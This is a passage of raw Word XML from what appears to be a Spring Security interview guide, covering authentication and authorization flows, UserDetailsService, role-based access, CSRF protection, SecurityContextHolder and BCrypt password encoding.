      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="6C8A593B" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F02BA7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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B8967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dentials (e.g., username, password, token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02720DD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s, permissions, policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="1E48F294" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="128E220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come</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71BB244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identity is confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="336AABA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is granted or denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F8ECC5D"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5038B2">
          <v:rect id="_x0000_i2143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442F94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Flow (Spring Boot Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7FAF7"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logs in via /login (form, basic auth, OAuth, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E83E3"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authenticates using a configured provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC267E3" w14:textId="77777777" w:rsidR="008273D5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E05B58" w:rsidP="00581E2A">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tailsService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18450B" w14:textId="77777777" w:rsidR="008273D5"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AuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F55AFC" w14:textId="55085100"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Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0603F" w14:textId="72F2745E" w:rsidR="00E05B58"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successful, a SecurityContext is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25691D8A"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E420">
          <v:rect id="_x0000_i2144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F0A0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orization Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D389EE0" w14:textId="77777777" w:rsidR="00D37131"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 Spring checks what resources the user is allowed to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65733D8B" w14:textId="180F478D" w:rsidR="00E05B58"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ntrolled using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BA861"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Authorize("hasRole('ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE0A0B"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authorizeRequests() in the config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D393A" w14:textId="5F61621E"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or permission-based policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520796F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in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC1558" w14:textId="77777777" w:rsidR="00753CC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00753CC8" w:rsidP="00E05B58">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E15F1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6AE9BA9B"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lastRenderedPageBreak/>
        <w:t>@EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8BF8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SecurityConfigurerAdap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C945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870764"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E3332D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curity</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331037"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01F63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554F1C2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6F705C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Any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DA4F9A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1D0995FE"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3CBF87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mLogin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1307696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E63B0D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p>
    <w:p w14:paraId="718518A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0917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A774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0EAF875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userDetails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8ABB6"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3F1056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password"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFC63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6DF3540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AEAEE0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admi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11B95A08"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admin"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFAB3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A1738C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EB5E6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MemoryUserDetails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min</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9068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839940" w14:textId="2291D961"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F301FC"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B82F7">
          <v:rect id="_x0000_i2145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A00E64"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entication Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA62E11"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DA57C"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based (JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E90AB4"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 / OpenID Connect (Google, GitHub)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094A370" w14:textId="1498E72B" w:rsidR="00E05B58"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ometric / SSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514ECB08"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BDB54">
          <v:rect id="_x0000_i2146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFC1B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orization Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E15FF"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based (RBAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C48054"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mission-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12676665" w14:textId="7803C5B4" w:rsidR="00E05B58"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ribute-based access control (ABAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CFE6A4"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D9F5B1">
          <v:rect id="_x0000_i2147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFF30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al-World Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0008BC" w14:textId="77777777" w:rsidR="00C66656"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showing your ID at the gate to prove your identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB1807" w14:textId="0C7FC047" w:rsidR="00E05B58"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is whether you're allowed to enter the VIP lounge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B17BC" w14:textId="621F37C6" w:rsidR="008C4090" w:rsidRPr="00CE4B95"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48" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A318D" w14:textId="1CE30E59" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E10" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc197867691"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of UserDetailsService in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="1F219A4F" w14:textId="2A60F0DA" w:rsidR="00231E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E10" w:rsidP="0022015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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load user-specific data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during authentication. You override it to fetch user details from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DB, LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or any source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760218B7"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B146C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> loadUserBy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1808ABE" w14:textId="75543F3B"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7AF702" w14:textId="708ED639" w:rsidR="00C32F38" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C32F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2862C791">
          <v:rect id="_x0000_i2149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782217B" w14:textId="245D0AFB" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00796528" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc197867692"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement Role-Based Authorization</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w14:paraId="464B40E1" w14:textId="2744D025" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95"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method security or HTTP configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441B737"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Method level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E7419"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@PreAuthoriz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asRole('ADMIN')"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358C8FB"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0234696"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HTTP configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44069CBA" w14:textId="678098F1"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7F5EDEB3" w14:textId="053899B9" w:rsidR="00C32F38" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C32F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="400B1BDC">
          <v:rect id="_x0000_i2150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="022EE732" w14:textId="4FEAD79F" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00673879" w:rsidP="00C93D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc197867693"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is CSRF and how does Spring Security protect against it</w:t>
      </w:r>
      <w:r w:rsidR="00C93D1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p w14:paraId="2A78DB82" w14:textId="2DEF37F5" w:rsidR="00156347" w:rsidRPr="00CE4B95" w:rsidRDefault="00156347" w:rsidP="00DC0486">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CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an attack that forces authenticated users to perform unwanted actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989E543" w14:textId="77777777" w:rsidR="00156347"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Spring Security enables CSRF protection by default for non-GET methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C681A64" w14:textId="5D71D72C" w:rsidR="00C93D1E"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To disable (not recommended unless you're using stateless APIs like JWT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DC5A9" w14:textId="42D36F7D" w:rsidR="00E063CD" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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able</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28D2E1" w14:textId="3AE351CF" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95"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51" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC3053" w14:textId="5E153D83" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E347A0" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="_Toc197867694"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of SecurityContextHolder</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w14:paraId="6A369486" w14:textId="25FCBA7A" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95"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It holds the SecurityContext, which contains the authenticated user's Authentication object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0391E7" w14:textId="77777777" w:rsidR="004A02AD" w:rsidRPr="00CE4B95" w:rsidRDefault="004A02AD" w:rsidP="004A02AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB59B32" w14:textId="44200469" w:rsidR="005F52D5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> au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tex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uthentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECD79C" w14:textId="7429CC08"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52" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1849F8" w14:textId="6B0B94CE" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00603252" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc197867695"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is password encryption handled in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="6DDAA82D" w14:textId="16114E73" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95"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PasswordEncoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3A74F"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E664BA7"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sswordEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> passwordEnco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12A38"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CryptPasswordEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25422A0D" w14:textId="557A81D9"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872B490" w14:textId="06040B6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53" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63860001" w14:textId="0B164601" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc197867696"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between hasRole() and hasAuthority()</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="26BB24C5" w14:textId="504287CA"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958"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w14:paraId="1C61DC19" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A938C1B"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0972DE6C"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 Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
